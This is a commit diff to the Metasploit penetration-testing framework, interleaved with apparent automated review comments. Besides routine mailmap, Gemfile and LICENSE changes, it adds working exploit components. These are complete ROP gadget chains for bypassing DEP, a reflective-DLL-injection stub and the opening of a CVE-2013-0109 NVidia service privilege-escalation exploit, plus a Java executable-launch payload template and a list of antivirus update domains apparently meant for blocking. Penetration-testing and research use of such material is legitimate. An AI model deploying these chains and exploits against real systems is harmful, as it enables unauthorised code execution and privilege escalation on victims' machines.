commit
dfe4e334fc
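--- a/.mailmap
+++ b/.mailmap
@@ -2,6 +2,7 @@ bturner-r7 <bturner-r7@github> Brandon Turner <brandon_turner@rapid7.com>
 dmaloney-r7 <dmaloney-r7@github> David Maloney <David_Maloney@rapid7.com>
 dmaloney-r7 <dmaloney-r7@github> David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
 ecarey-r7 <ecarey-r7@github> Erran Carey <e@ipwnstuff.com>
+farias-r7 <farias-r7@github> Fernando Arias <fernando_arias@rapid7.com>
 hmoore-r7 <hmoore-r7@github> HD Moore <hd_moore@rapid7.com>
 hmoore-r7 <hmoore-r7@github> HD Moore <hdm@digitaloffense.net>
 jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt
@@ -13,14 +14,16 @@ jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan.vazquez@metasploit.com>
 jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan_vazquez@rapid7.com>
 limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com>
 shuckins-r7 <shuckins-r7@github> Samuel Huckins <samuel_huckins@rapid7.com>
-tasos-r7 <tasos-r7@github> Tasos Laskos <Tasos_Laskos@rapid7.com>
 todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com>
 todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com>
+todb-r7 <todb-r7@github> Tod Beardsley <todb@packetfu.com>
+trosen-r7 <trosen-r7@github> Trevor Rosen <Trevor_Rosen@rapid7.com>
 wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r
 wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com>
 wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
 wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com>
 wvu-r7 <wvu-r7@github> William Vu <wvu@metasploit.com>
+wvu-r7 <wvu-r7@github> William Vu <wvu@nmt.edu>
 
 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@@ -72,9 +75,18 @@ OJ <oj@github> OJ Reeves <oj@buffered.io>
 OJ <oj@github> OJ <oj@buffered.io>
 r3dy <r3dy@github> Royce Davis <r3dy@Royces-MacBook-Pro.local>
 r3dy <r3dy@github> Royce Davis <royce.e.davis@gmail.com>
+Rick Flores <0xnanoquetz9l@gmail.com> Rick Flores (nanotechz9l) <0xnanoquetz9l@gmail.com>
 rsmudge <rsmudge@github> Raphael Mudge <rsmudge@gmail.com> # Aka `butane
 schierlm <schierlm@github> Michael Schierl <schierlm@gmx.de> # Aka mihi
 scriptjunkie <scriptjunkie@github> Matt Weeks <scriptjunkie@scriptjunkie.us>
 skape <skape@???> Matt Miller <mmiller@hick.org>
 spoonm <spoonm@github> Spoon M <spoonm@gmail.com>
 swtornio <swtornio@github> Steve Tornio <swtornio@gmail.com>
+Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
+TrustedSec <davek@trustedsec.com> trustedsec <davek@trustedsec.com>
+
+# Aliases for utility author names. Since they're fake, typos abound
+
+Tab Assassin <tabassassin@metasploit.com> Tabasssassin <tabassassin@metasploit.com>
+Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
+Tab Assassin <tabassassin@metasploit.com> TabAssassin <tabasssassin@metasploit.com>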
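--- a/Gemfile
+++ b/Gemfile
@@ -2,6 +2,8 @@ source 'https://rubygems.org'
 
 # Need 3+ for ActiveSupport::Concern
 gem 'activesupport', '>= 3.0.0'
+# Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
+gem 'bcrypt-ruby'
 # Needed for some admin modules (scrutinizer_add_user.rb)
 gem 'json'
 # Needed by msfgui and other rpc components
@@ -17,7 +19,7 @@ group :db do
 # Needed for Msf::DbManager
 gem 'activerecord'
 # Database models shared between framework and Pro.
-gem 'metasploit_data_models', '~> 0.16.6'
+gem 'metasploit_data_models', '~> 0.16.9'
 # Needed for module caching in Mdm::ModuleDetails
 gem 'pg', '>= 0.11'
 end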
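Review bot: `gem 'bcrypt-ruby'` in the first hunk is declared with no version constraint, while the neighbouring declarations carry one (`'>= 3.0.0'` here, `'~> 0.16.9'` in the second hunk), so nothing in the Gemfile records which bcrypt-ruby the bundle was tested against. The Gemfile.lock in this commit resolves it to 3.1.2; a floor such as `gem 'bcrypt-ruby', '>= 3.1.2'` would keep that documented and stop an unconstrained resolution from drifting whenever the lock is regenerated. Whether the module named in the comment needs a specific bcrypt API is not visible here.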
|
|
@ -13,6 +13,7 @@ GEM
|
||||||
i18n (~> 0.6, >= 0.6.4)
|
i18n (~> 0.6, >= 0.6.4)
|
||||||
multi_json (~> 1.0)
|
multi_json (~> 1.0)
|
||||||
arel (3.0.2)
|
arel (3.0.2)
|
||||||
|
bcrypt-ruby (3.1.2)
|
||||||
builder (3.0.4)
|
builder (3.0.4)
|
||||||
database_cleaner (1.1.1)
|
database_cleaner (1.1.1)
|
||||||
diff-lcs (1.2.4)
|
diff-lcs (1.2.4)
|
||||||
|
@ -21,7 +22,7 @@ GEM
|
||||||
fivemat (1.2.1)
|
fivemat (1.2.1)
|
||||||
i18n (0.6.5)
|
i18n (0.6.5)
|
||||||
json (1.8.0)
|
json (1.8.0)
|
||||||
metasploit_data_models (0.16.6)
|
metasploit_data_models (0.16.9)
|
||||||
activerecord (>= 3.2.13)
|
activerecord (>= 3.2.13)
|
||||||
activesupport
|
activesupport
|
||||||
pg
|
pg
|
||||||
|
@ -61,11 +62,12 @@ PLATFORMS
|
||||||
DEPENDENCIES
|
DEPENDENCIES
|
||||||
activerecord
|
activerecord
|
||||||
activesupport (>= 3.0.0)
|
activesupport (>= 3.0.0)
|
||||||
|
bcrypt-ruby
|
||||||
database_cleaner
|
database_cleaner
|
||||||
factory_girl (>= 4.1.0)
|
factory_girl (>= 4.1.0)
|
||||||
fivemat (= 1.2.1)
|
fivemat (= 1.2.1)
|
||||||
json
|
json
|
||||||
metasploit_data_models (~> 0.16.6)
|
metasploit_data_models (~> 0.16.9)
|
||||||
msgpack
|
msgpack
|
||||||
network_interface (~> 0.0.1)
|
network_interface (~> 0.0.1)
|
||||||
nokogiri
|
nokogiri
|
||||||
|
|
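--- a/LICENSE
+++ b/LICENSE
@@ -41,93 +41,10 @@ Copyright: 2004-2005 vlad902 <vlad902 [at] gmail.com>
 2007 H D Moore <hdm [at] metasploit.com>
 License: GPL-2 and Artistic
 
-Files: external/source/meterpreter/ReflectiveDLLInjection/*
-Copyright: 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+Files: external/source/ReflectiveDLLInjection/*
+Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
 License: BSD-3-clause
 
-Files: external/source/meterpreter/source/common/queue.h
-Copyright: 1991, 1993 The Regents of the University of California
-License: BSD-3-clause
-
-Files: external/source/meterpreter/source/common/zlib/* external/source/meterpreter/source/server/zlib/*
-Copyright: 1995-1996 Jean-loup Gailly and Mark Adler
-License: Zlib
-
-Files: external/source/meterpreter/source/bionic/libc/*
-Copyright: 2005-2008, The Android Open Source Project
-2004 by Internet Systems Consortium, Inc. ("ISC")
-1995,1996,1999 by Internet Software Consortium
-1995 by International Business Machines, Inc.
-1997,1998,1999,2004 The NetBSD Foundation, Inc.
-1993 Christopher G. Demetriou
-1983,1985,1989,1993 The Regents of the University of California
-2000 Ben Harris
-1995,1996,1997,1998 WIDE Project
-2003 Networks Associates Technology, Inc.
-1993 by Digital Equipment Corporation
-1997 Mark Brinicombe
-1993 Martin Birgmeier
-1993 by Sun Microsystems, Inc.
-1997, 2005 Todd C. Miller <Todd.Miller@courtesan.com>
-1995, 1996 Carnegie-Mellon University
-2003 Networks Associates Technology, Inc.
-License: BSD-3-clause and BSD-4-clause
-
-Files: external/source/meterpreter/source/bionic/libdl/*
-Copyright: 2007 The Android Open Source Project
-License: BSD-3-clause
-
-Files: external/source/meterpreter/source/bionic/libm/*
-Copyright: 2003, Steven G. Kargl
-2003 Mike Barcroft <mike@FreeBSD.org>
-2002-2005 David Schultz <das@FreeBSD.ORG>
-2004 Stefan Farfeleder
-2003 Dag-Erling Coïdan Smørgrav
-1996 The NetBSD Foundation, Inc.
-1985,1988,1991,1992,1993 The Regents of the University of California
-1993,94 Winning Strategies, Inc.
-1993, 2004 by Sun Microsystems, Inc.
-License: BSD-2-clause and BSD-3-clause and BSD-4-clause
-
-Files: external/source/meterpreter/source/extensions/espia/screen.c
-Copyright: 1994-2008, Mark Hammond
-License: BSD-2-clause
-
-Files: external/source/meterpreter/source/extensions/priv/server/timestomp.c
-Copyright: 2005 Vincent Liu
-License: GPL-2
-
-Files: external/source/meterpreter/source/extensions/stdapi/server/webcam/bmp2jpeg.c external/source/meterpreter/source/screenshot/bmp2jpeg.c
-Copyright: 1994-2008, Mark Hammond
-License: BSD-2-clause
-
-Files: external/source/meterpreter/source/extensions/stdapi/server/railgun/railgun.c
-Copyright: 2010, patrickHVE@googlemail.com
-License: BSD-2-clause
-
-Files: external/source/meterpreter/source/pssdk/*
-Copyright: microOLAP
-License: N/A
-Comment: HD Moore holds a single-seat developer license for the Packet Sniffer
-SDK library embedded into the Meterpreter Sniffer extension. This
-source code is not distributed with Metasploit Framework.
-
-Files: external/source/meterpreter/source/openssl/*
-Copyright: 1998-2002 The OpenSSL Project
-License: OpenSSL and SSLeay
-
-Files: external/source/meterpreter/source/server/posix/sfsyscall.h
-Copyright: 2003 Philippe Biondi <biondi@cartel-securite.fr>
-License: LGPL
-
-Files: external/source/meterpreter/source/jpeg-8/*
-Copyright: 1991-2010, Thomas G. Lane, Guido Vollbeding
-License: BSD-3-clause
-
-Files: external/source/meterpreter/source/libpcap/*
-Copyright: 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997 The Regents of the University of California.
-License: BSD-4-clause
-
 Files: external/source/metsvc/*
 Copyright: 2007, Determina Inc.
 License: BSD-3-clause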
|
Binary file not shown.
|
@ -0,0 +1,132 @@
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||||
|
<db>
|
||||||
|
|
||||||
|
<rop>
|
||||||
|
<compatibility>
|
||||||
|
<target>9</target>
|
||||||
|
</compatibility>
|
||||||
|
|
||||||
|
<gadgets base="0x4a800000">
|
||||||
|
<gadget offset="0x2313d">pop ecx # ret</gadget>
|
||||||
|
<gadget offset="0x2a713">push eax # pop esp # ret</gadget>
|
||||||
|
<gadget offset="0x01f90">pop eax # ret</gadget>
|
||||||
|
<gadget offset="0x49038">ptr to CreateFileMappingA()</gadget>
|
||||||
|
<gadget offset="0x07e7d">call [eax] # ret</gadget>
|
||||||
|
<gadget value="0xffffffff">HANDLE hFile</gadget>
|
||||||
|
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
|
||||||
|
<gadget value="0x00000040">DWORD flProtect</gadget>
|
||||||
|
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
|
||||||
|
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
|
||||||
|
<gadget value="0x00000000">LPCTSTR lpName</gadget>
|
||||||
|
<gadget offset="0x0155a">pop edi # ret</gadget>
|
||||||
|
<gadget offset="0x43a84">pop ebp # pop ebx # pop ecx # ret</gadget>
|
||||||
|
<gadget offset="0x2d4de">pop ebx # ret</gadget>
|
||||||
|
<gadget offset="0x01f90">pop eax # ret</gadget>
|
||||||
|
<gadget offset="0x476aa">pop ecx # ret</gadget>
|
||||||
|
<gadget offset="0x49030">ptr to MapViewOfFile()</gadget>
|
||||||
|
<gadget offset="0x44122">mov edx, ecx</gadget>
|
||||||
|
<gadget offset="0x476aa">pop ecx # ret</gadget>
|
||||||
|
<gadget offset="0x07e7d">call [eax] # ret</gadget>
|
||||||
|
<gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
|
||||||
|
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
|
||||||
|
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
|
||||||
|
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
|
||||||
|
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
|
||||||
|
<gadget offset="0x43a82">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
|
||||||
|
<gadget offset="0x46c5e">jmp IAT msvcr80!memcpy</gadget>
|
||||||
|
<gadget offset="0x476ab">ret</gadget>
|
||||||
|
<gadget value="junk">JUNK</gadget>
|
||||||
|
<gadget value="0x00000400">memcpy length</gadget>
|
||||||
|
<gadget value="junk">JUNK</gadget>
|
||||||
|
<gadget offset="0x17984">xchg eax, ebp # ret</gadget>
|
||||||
|
<gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
|
||||||
|
</gadgets>
|
||||||
|
</rop>
|
||||||
|
|
||||||
|
<rop>
|
||||||
|
<compatibility>
|
||||||
|
<target>10</target>
|
||||||
|
</compatibility>
|
||||||
|
|
||||||
|
<gadgets base="0x4a800000">
|
||||||
|
<gadget offset="0x26015">pop ecx # ret</gadget>
|
||||||
|
<gadget offset="0x2e090">push eax # pop esp # ret</gadget>
|
||||||
|
<gadget offset="0x2007d">pop eax # ret</gadget>
|
||||||
|
<gadget offset="0x50038">ptr to CreateFileMappingA()</gadget>
|
||||||
|
<gadget offset="0x246d5">call [eax] # ret</gadget>
|
||||||
|
<gadget value="0xffffffff">HANDLE hFile</gadget>
|
||||||
|
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
|
||||||
|
<gadget value="0x00000040">DWORD flProtect</gadget>
|
||||||
|
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
|
||||||
|
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
|
||||||
|
<gadget value="0x00000000">LPCTSTR lpName</gadget>
|
||||||
|
<gadget offset="0x05016">pop edi # ret</gadget>
|
||||||
|
<gadget offset="0x4420c">pop ebp # pop ebx # pop ecx # ret</gadget>
|
||||||
|
<gadget offset="0x14241">pop ebx # ret</gadget>
|
||||||
|
<gadget offset="0x2007d">pop eax # ret</gadget>
|
||||||
|
<gadget offset="0x26015">pop ecx # ret</gadget>
|
||||||
|
<gadget offset="0x50030">ptr to MapViewOfFile()</gadget>
|
||||||
|
<gadget offset="0x4b49d">mov edx, ecx</gadget>
|
||||||
|
<gadget offset="0x26015">pop ecx # ret</gadget>
|
||||||
|
<gadget offset="0x246d5">call [eax] # ret</gadget>
|
||||||
|
<gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
|
||||||
|
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
|
||||||
|
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
|
||||||
|
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
|
||||||
|
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
|
||||||
|
<gadget offset="0x14013">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
|
||||||
|
<gadget offset="0x4e036">jmp to IAT msvcr90!memcpy</gadget>
|
||||||
|
<gadget offset="0x2a8df">ret</gadget>
|
||||||
|
<gadget value="junk">JUNK</gadget>
|
||||||
|
<gadget value="0x00000400">memcpy length</gadget>
|
||||||
|
<gadget value="junk">JUNK</gadget>
|
||||||
|
<gadget offset="0x18b31">xchg eax, ebp # ret</gadget>
|
||||||
|
<gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
|
||||||
|
</gadgets>
|
||||||
|
</rop>
|
||||||
|
|
||||||
|
<rop>
|
||||||
|
<compatibility>
|
||||||
|
<target>11</target>
|
||||||
|
</compatibility>
|
||||||
|
|
||||||
|
<gadgets base="0x4a800000">
|
||||||
|
<gadget offset="0x5822c">pop ecx # ret</gadget>
|
||||||
|
<gadget offset="0x2f129">push eax # pop esp # ret</gadget>
|
||||||
|
<gadget offset="0x5597f">pop eax # ret</gadget>
|
||||||
|
<gadget offset="0x66038">ptr to CreateFileMappingA()</gadget>
|
||||||
|
<gadget offset="0x3f1d5">call [eax] # ret</gadget>
|
||||||
|
<gadget value="0xffffffff">HANDLE hFile</gadget>
|
||||||
|
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
|
||||||
|
<gadget value="0x00000040">DWORD flProtect</gadget>
|
||||||
|
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
|
||||||
|
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
|
||||||
|
<gadget value="0x00000000">LPCTSTR lpName</gadget>
|
||||||
|
<gadget offset="0x55093">pop edi # ret</gadget>
|
||||||
|
<gadget value="junk">JUNK</gadget>
|
||||||
|
<gadget offset="0x50030">pop ebx # pop esi # pop ebp # ret</gadget>
|
||||||
|
<gadget offset="0x5597f">pop eax # ret</gadget>
|
||||||
|
<gadget offset="0x50031">pop esi # pop ebp # ret</gadget>
|
||||||
|
<gadget value="junk">JUNK</gadget>
|
||||||
|
<gadget offset="0x5822c">pop ecx # ret</gadget>
|
||||||
|
<gadget offset="0x3f1d5">call [eax] # ret</gadget>
|
||||||
|
<gadget offset="0x5d4f8">pop edx # ret</gadget>
|
||||||
|
<gadget offset="0x66030">ptr to MapViewOfFile()</gadget>
|
||||||
|
<gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
|
||||||
|
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
|
||||||
|
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
|
||||||
|
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
|
||||||
|
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
|
||||||
|
<gadget offset="0x14856">pop edi # pop esi # pop ebp # ret</gadget>
|
||||||
|
<gadget offset="0x505a0">memcpy address</gadget>
|
||||||
|
<gadget offset="0x60bc4">call eax # ret</gadget>
|
||||||
|
<gadget offset="0x505a0">memcpy address</gadget>
|
||||||
|
<gadget offset="0x1c376">xchg eax, ebp # ret</gadget>
|
||||||
|
<gadget offset="0x463d0">pop ebx # ret</gadget>
|
||||||
|
<gadget value="0x00000400">memcpy length</gadget>
|
||||||
|
<gadget offset="0x5d4f8">pop edx # ret</gadget>
|
||||||
|
<gadget offset="0x5d4f8">pop edx # ret</gadget>
|
||||||
|
<gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
|
||||||
|
</gadgets>
|
||||||
|
</rop>
|
||||||
|
</db>
|
|
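Review bot: In each of the three `<gadgets>` blocks the `0x00001000` entry is labelled `DWORD dwMaximumSizeHigh`, the same name as the `0x00000000` entry directly above it, and CreateFileMappingA has no two parameters of that name; the second label is presumably meant to be `DWORD dwMaximumSizeLow`. These labels are descriptive text only, but they are what a maintainer reads when checking the argument order against the API, so the entry in the target 9 block and the two copies in the target 10 and 11 blocks should be corrected together. This file section carries no file-name header on the page, so the path cannot be confirmed from here.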
@ -44,6 +44,8 @@
|
||||||
}
|
}
|
||||||
else
|
else
|
||||||
{
|
{
|
||||||
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
|
String[] %{var_exepatharray} = new String[1];
|
||||||
|
%{var_exepatharray}[0] = %{var_exepath};
|
||||||
|
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
|
||||||
}
|
}
|
||||||
%%>
|
%%>
|
||||||
|
|
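Review bot: The switch from `exec(String)` to the `String[]` overload deserves a one-line comment at the new `exec` call, because the reason is invisible at the call site and the next maintainer may fold it back into the shorter form: `// exec(String[]) passes the path as a single argv element; exec(String) would tokenize it on whitespace`. The `if`/`else` this sits in and the method around it begin outside the hunk, so the condition that selects this branch is not visible here.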
BIN
data/vncdll.dll
BIN
data/vncdll.dll
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,28 @@
|
||||||
|
www.es-web.sophos.com
|
||||||
|
www.es-web.sophos.com.edgesuite.net
|
||||||
|
www.es-web-2.sophos.com
|
||||||
|
www.es-web-2.sophos.com.edgesuite.net
|
||||||
|
www.dnl-01.geo.kaspersky.com
|
||||||
|
www.downloads2.kaspersky-labs.com
|
||||||
|
www.liveupdate.symantecliveupdate.com
|
||||||
|
www.liveupdate.symantec.com
|
||||||
|
www.update.symantec.com
|
||||||
|
www.update.nai.com
|
||||||
|
www.download797.avast.com
|
||||||
|
www.guru.avg.com
|
||||||
|
www.osce8-p.activeupdate.trendmicro.com
|
||||||
|
www.forefrontdl.microsoft.com
|
||||||
|
es-web.sophos.com
|
||||||
|
es-web.sophos.com.edgesuite.net
|
||||||
|
es-web-2.sophos.com
|
||||||
|
es-web-2.sophos.com.edgesuite.net
|
||||||
|
dnl-01.geo.kaspersky.com
|
||||||
|
downloads2.kaspersky-labs.com
|
||||||
|
liveupdate.symantecliveupdate.com
|
||||||
|
liveupdate.symantec.com
|
||||||
|
update.symantec.com
|
||||||
|
update.nai.com
|
||||||
|
download797.avast.com
|
||||||
|
guru.avg.com
|
||||||
|
osce8-p.activeupdate.trendmicro.com
|
||||||
|
forefrontdl.microsoft.com
|
File diff suppressed because it is too large
|
@ -1,15 +1 @@
|
||||||
OPTS="-x .ut.rb -x .ts.rb -x samples -q"
|
rake yard
|
||||||
BASE="$(dirname "$0")"
|
|
||||||
MSFDIR="${BASE}/.."
|
|
||||||
DOCDIR="${BASE}/api"
|
|
||||||
doc=$(which sdoc)
|
|
||||||
|
|
||||||
if [ -z $doc ]; then
|
|
||||||
doc=$(which rdoc)
|
|
||||||
fi
|
|
||||||
|
|
||||||
echo "Using ${doc} for doc generation"
|
|
||||||
echo "Putting docs in ${DOCDIR}"
|
|
||||||
|
|
||||||
$doc $OPTS -t "Metasploit Documentation" -o ${DOCDIR} ${MSFDIR}/lib/rex ${MSFDIR}/lib/msf
|
|
||||||
|
|
||||||
|
|
|
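Review bot: The new one-line body runs `rake yard` from whatever directory the caller happens to be in, whereas the removed lines anchored every path to `$(dirname "$0")`; invoked from outside the repository root, rake will presumably not find the Rakefile. Keeping that anchoring costs one line, `cd "$(dirname "$0")/.." && exec rake yard`. The hunk starts at line 1 on both sides, so neither version has a shebang; a `#!/bin/sh` first line would let the file run directly as before.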
@ -70,7 +70,8 @@
|
||||||
<AdditionalOptions>/ignore:4070</AdditionalOptions>
|
<AdditionalOptions>/ignore:4070</AdditionalOptions>
|
||||||
</Link>
|
</Link>
|
||||||
<PostBuildEvent>
|
<PostBuildEvent>
|
||||||
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL</Command>
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
|
||||||
|
exit 0</Command>
|
||||||
</PostBuildEvent>
|
</PostBuildEvent>
|
||||||
<ResourceCompile>
|
<ResourceCompile>
|
||||||
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
|
|
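Review bot: Appending `exit 0` to the post-build `<Command>` turns every editbin.exe failure, including the tool being absent from PATH, into a successful build, so a binary whose `/OSVERSION` and `/SUBSYSTEM` fields were never rewritten passes silently. If the intent is only to tolerate a missing editbin, make that the explicit condition (for example run the command behind a `where editbin.exe` check) rather than discarding every exit code; if the result really is irrelevant, a comment next to the line saying why would stop a reader from treating this as a bug.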
@ -0,0 +1,18 @@
|
||||||
|
<?xml version="1.0" standalone="yes"?>
|
||||||
|
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<PropertyGroup>
|
||||||
|
<SolutionPath>.\nvidia_nvsvc.sln</SolutionPath>
|
||||||
|
</PropertyGroup>
|
||||||
|
|
||||||
|
<Target Name="all" DependsOnTargets="x86" />
|
||||||
|
|
||||||
|
<Target Name="x86">
|
||||||
|
<Message Text="Building CVE-2013-0109 NVidia nvsvc x86 Release version" />
|
||||||
|
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
|
||||||
|
</Target>
|
||||||
|
|
||||||
|
<Target Name="x64">
|
||||||
|
<Message Text="NVidia nvsvc is not supported in x64" />
|
||||||
|
</Target>
|
||||||
|
</Project>
|
||||||
|
|
|
@ -0,0 +1,22 @@
|
||||||
|
|
||||||
|
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||||
|
# Visual Studio 2013
|
||||||
|
VisualStudioVersion = 12.0.21005.1
|
||||||
|
MinimumVisualStudioVersion = 10.0.40219.1
|
||||||
|
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "nvidia_nvsvc", "nvidia_nvsvc\nvidia_nvsvc.vcxproj", "{6B3FF768-1F25-49C1-8827-EDEC84D4749F}"
|
||||||
|
EndProject
|
||||||
|
Global
|
||||||
|
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||||
|
Debug|Win32 = Debug|Win32
|
||||||
|
Release|Win32 = Release|Win32
|
||||||
|
EndGlobalSection
|
||||||
|
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||||
|
{6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||||
|
{6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Debug|Win32.Build.0 = Debug|Win32
|
||||||
|
{6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Release|Win32.ActiveCfg = Release|Win32
|
||||||
|
{6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Release|Win32.Build.0 = Release|Win32
|
||||||
|
EndGlobalSection
|
||||||
|
GlobalSection(SolutionProperties) = preSolution
|
||||||
|
HideSolutionNode = FALSE
|
||||||
|
EndGlobalSection
|
||||||
|
EndGlobal
|
|
@ -0,0 +1,33 @@
|
||||||
|
//===============================================================================================//
|
||||||
|
// This is a stub for the actual functionality of the DLL.
|
||||||
|
//===============================================================================================//
|
||||||
|
|
||||||
|
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
|
||||||
|
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
|
||||||
|
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
|
||||||
|
|
||||||
|
#include "nvidia_nvsvc.h"
|
||||||
|
|
||||||
|
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
|
||||||
|
{
|
||||||
|
BOOL bReturnValue = TRUE;
|
||||||
|
switch (dwReason)
|
||||||
|
{
|
||||||
|
case DLL_QUERY_HMODULE:
|
||||||
|
hAppInstance = hinstDLL;
|
||||||
|
if (lpReserved != NULL)
|
||||||
|
{
|
||||||
|
*(HMODULE *)lpReserved = hAppInstance;
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case DLL_PROCESS_ATTACH:
|
||||||
|
hAppInstance = hinstDLL;
|
||||||
|
elevate_nvidia_nvsvc(lpReserved);
|
||||||
|
break;
|
||||||
|
case DLL_PROCESS_DETACH:
|
||||||
|
case DLL_THREAD_ATTACH:
|
||||||
|
case DLL_THREAD_DETACH:
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
return bReturnValue;
|
||||||
|
}
|
|
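Review bot: `bReturnValue` is set to TRUE at the top of DllMain and never changed on any path, so `return bReturnValue;` is just `return TRUE;` and the local can be dropped. Neither `DLL_QUERY_HMODULE` nor `hAppInstance` is declared in this file; they presumably come from the included ReflectiveLoader.c (enabled by the `REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN` define above), and a short comment on the `switch` such as `/* DLL_QUERY_HMODULE and hAppInstance are provided by ReflectiveLoader.c */` would save the next reader a search. `lpReserved` is handed straight to `elevate_nvidia_nvsvc()` on DLL_PROCESS_ATTACH; what that function expects in it is not visible here and would be worth stating in nvidia_nvsvc.h.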
@ -0,0 +1,546 @@
|
||||||
|
/*
|
||||||
|
NVidia Display Driver Service (Nsvr) Exploit - Christmas 2012
|
||||||
|
- Bypass DEP + ASLR + /GS + CoE
|
||||||
|
=============================================================
|
||||||
|
(@peterwintrsmith)
|
||||||
|
|
||||||
|
** Initial release 25/12/12
|
||||||
|
** Update 25/12/12 - Target for 30 Aug 2012 nvvsvc.exe Build - thanks
|
||||||
|
@seanderegge!
|
||||||
|
|
||||||
|
Hey all!
|
||||||
|
|
||||||
|
Here is an interesting exploit for a stack buffer overflow in the NVidia
|
||||||
|
Display Driver Service. The service listens on a named pipe (\pipe\nsvr)
|
||||||
|
which has a NULL DACL configured, which should mean that any logged on user
|
||||||
|
or remote user in a domain context (Windows firewall/file sharing
|
||||||
|
permitting) should be able to exploit this vulnerability.
|
||||||
|
|
||||||
|
The buffer overflow occurs as a result of a bad memmove operation, with the
|
||||||
|
stack layout effectively looking like this:
|
||||||
|
|
||||||
|
[locals]
|
||||||
|
[received-data]
|
||||||
|
[response-buf]
|
||||||
|
[stack cookie]
|
||||||
|
[return address]
|
||||||
|
[arg space]
|
||||||
|
[etc]
|
||||||
|
|
||||||
|
The memmove copies data from the received-data buffer into the response-buf
|
||||||
|
buffer, unchecked. It is possible to control the offset from which the copy
|
||||||
|
starts in the received-data buffer by embedding a variable length string -
|
||||||
|
which forms part of the protocol message being crafted - as well as the
|
||||||
|
number of bytes copied into the response buffer.
|
||||||
|
|
||||||
|
The amount of data sent back over the named pipe is related to the number
|
||||||
|
of bytes copied rather than the maximum number of bytes that the buffer is
|
||||||
|
able to safely contain, so it is possible to leak stack data by copying
|
||||||
|
from the end of the received-data buffer, through the response-buf buffer
|
